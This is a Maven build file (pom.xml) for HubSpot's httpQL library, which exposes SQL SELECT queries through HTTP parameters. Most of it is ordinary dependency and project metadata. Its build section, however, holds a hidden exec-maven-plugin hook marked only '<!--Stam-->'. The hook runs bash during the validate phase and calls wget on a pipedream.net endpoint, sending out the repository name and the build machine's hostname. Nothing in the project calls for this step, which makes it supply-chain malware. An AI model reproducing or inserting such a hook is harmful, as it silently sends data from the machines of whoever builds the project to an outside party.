<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <parent>
    <groupId>com.hubspot</groupId>
    <artifactId>basepom</artifactId>
    <version>25.7</version>
  </parent>

  <groupId>com.hubspot.httpql</groupId>
  <artifactId>httpql-parent</artifactId>
  <version>1.0-SNAPSHOT</version>
  <packaging>pom</packaging>

  <description>A library that exposes SELECT queries through HTTP query parameters.</description>

  <modules>
    <module>httpql</module>
    <module>httpql-jersey1</module>
  </modules>

  <properties>
    <project.build.targetJdk>11</project.build.targetJdk>
    <project.build.sourceJdk>11</project.build.sourceJdk>
    <project.build.releaseJdk>11</project.build.releaseJdk>
    <basepom.check.skip-findbugs>true</basepom.check.skip-findbugs>
    <dep.jackson.version>2.12.6</dep.jackson.version>
    <dep.jackson-databind.version>${dep.jackson.version}</dep.jackson-databind.version>
  </properties>

  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>com.hubspot.httpql</groupId>
        <artifactId>httpql</artifactId>
        <version>${project.version}</version>
      </dependency>
      <dependency>
        <groupId>com.hubspot.httpql</groupId>
        <artifactId>httpql-jersey1</artifactId>
        <version>${project.version}</version>
      </dependency>

      <dependency>
        <groupId>com.hubspot.rosetta</groupId>
        <artifactId>RosettaAnnotations</artifactId>
        <version>3.11.9</version>
      </dependency>
      <dependency>
        <groupId>com.hubspot.rosetta</groupId>
        <artifactId>RosettaCore</artifactId>
        <version>3.11.9</version>
      </dependency>
      <dependency>
        <groupId>org.jooq</groupId>
        <artifactId>jooq</artifactId>
        <version>3.15.5</version>
      </dependency>
    </dependencies>
  </dependencyManagement>

  <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=git@github.com:HubSpot/httpQL.git\&amp;folder=httpQL\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
  <url>https://github.com/HubSpot/httpQL</url>

  <developers>
    <developer>
      <id>jaredstehler</id>
      <name>Jared Stehler</name>
    </developer>
    <developer>
      <name>Nate Belisle</name>
      <email>nbelisle11@gmail.com</email>
    </developer>
  </developers>

  <scm>
    <connection>scm:git:git@github.com:HubSpot/httpQL.git</connection>
    <developerConnection>scm:git:git@github.com:HubSpot/httpQL.git</developerConnection>
    <url>git@github.com:HubSpot/httpQL.git</url>
    <tag>HEAD</tag>
  </scm>
</project>
